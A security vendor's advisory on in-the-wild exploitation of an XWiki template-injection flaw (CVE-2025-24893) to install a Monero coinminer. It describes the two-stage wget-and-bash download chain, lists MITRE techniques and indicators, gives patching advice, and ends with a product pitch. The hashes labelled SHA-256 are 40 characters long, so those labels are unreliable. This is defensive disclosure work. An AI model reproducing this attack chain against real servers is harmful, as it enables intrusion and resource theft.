You are currently viewing Critical XWiki Vulnerability Abused in the Wild for Cryptocurrency Mining

Critical XWiki Vulnerability Abused in the Wild for Cryptocurrency Mining

  • Post author:
  • Reading time:3 mins read

A critical remote code execution (RCE) vulnerability (CVE-2025-24893) in XWiki, a widely-used open-source wiki platform, is being actively exploited in the wild. This exploitation leads to the deployment of cryptocurrency mining malware on compromised servers. The vulnerability allows unauthenticated attackers to inject malicious templates and execute arbitrary code, completely bypassing authentication mechanisms.

Vulnerability Details

The root cause of this vulnerability lies in a template injection flaw within XWiki’s SolrSearch endpoint. This flaw enables attackers to execute Groovy scripts, leading to command execution. A vulnerability intelligence firm, VulnCheck, reported active exploitation based on data from their Canary network, which simulates vulnerable systems to detect attacks.

The Two-Stage Exploitation Process

The exploitation unfolds in two distinct phases, separated by a delay of at least 20 minutes, likely to evade detection systems:

  1. Initial Request: Attackers send a URL-encoded GET request to the SolrSearch endpoint. This request injects an asynchronous Groovy payload, which then uses wget to download a downloader script (x640) from a command-and-control (C2) server at 193[.]32[.]208[.]24:8080. The downloaded script is saved as /tmp/11909 on the target system. The payload is designed to mimic legitimate browser traffic using a Firefox user agent.
  2. Second Request: Approximately 20 minutes later, a second request executes the downloaded script by invoking bash on /tmp/11909. This downloader then fetches two additional scripts, x521 and x522, and pipes them directly to bash for execution.

These additional scripts perform the following actions:

  • x521: Creates directories in /var/tmp, downloads the coinminer binary (tcrond) from the same C2 server, and sets executable permissions.
  • x522: Cleans the environment by terminating competing miners (such as xmrig and kinsing), clears history logs, and launches tcrond with a configuration pointing to auto[.]c3pool[.]org on port 80.

The coinminer binary, tcrond, is UPX-packed for obfuscation and is configured to use a Monero wallet address for payouts.

Tactics, Techniques, and Procedures (TTPs)

Attackers are employing the following MITRE ATT&CK tactics and techniques:

  • TA0001 – Initial Access: Exploiting a public-facing application to gain initial access.
  • TA0002 – Execution: Utilizing command and scripting interpreters for execution.
  • TA0003 – Persistence: Establishing persistence through boot or logon autostart execution.
  • TA0005 – Defense Evasion: Employing obfuscated files and information to evade detection.
  • TA0011 – Command and Control: Using application layer protocols for command and control.
  • TA0040 – Impact: Resource hijacking to mine cryptocurrency.
  • T1190 – Exploit Public-Facing Application: Gaining access by exploiting a vulnerability in a public-facing application.
  • T1059 – Command and Scripting Interpreter: Executing commands via scripting interpreters such as bash.
  • T1547 – Boot or Logon Autostart Execution: Achieving persistence by configuring the malware to execute upon system boot or user logon.
  • T1027 – Obfuscated Files or Information: Using UPX packing to obfuscate the coinminer binary.
  • T1071 – Application Layer Protocol: Communicating with the C2 server using application layer protocols.
  • T1496 – Resource Hijacking: Utilizing compromised resources for cryptocurrency mining.

Indicators of Compromise (IOCs)

  • IP Addresses: 123[.]25[.]249[.]88 (Attacker, Vietnam), 193[.]32[.]208[.]24 (C2 Server)
  • File Hashes (SHA-256):
    • tcrond (packed): 0b907eee9a85d39f8f0d7c503cc1f84a71c4de10
    • tcrond (unpacked): 90d274c7600fbdca5fe035250d0baff20889ec2b
    • x521: de082aeb01d41dd81cfb79bc5bfa33453b0022ed
    • x522: 2abd6f68a24b0a5df5809276016e6b85c77e5f7f
    • x640: 5abc337dbc04fee7206956dad1e0b6d43921a868

Mitigation & Recommendations

To mitigate the risk posed by this vulnerability, organizations using XWiki should take the following steps:

  • Patch Immediately: Upgrade XWiki to version 15.10.6 or later.
  • Monitor Network Traffic: Monitor for anomalous wget traffic.
  • Scan for IOCs: Scan systems for the indicators of compromise listed above.

Instantly Fix Risks with Saner Patch Management

Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.

It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.

Experience the fastest and most accurate patching software here.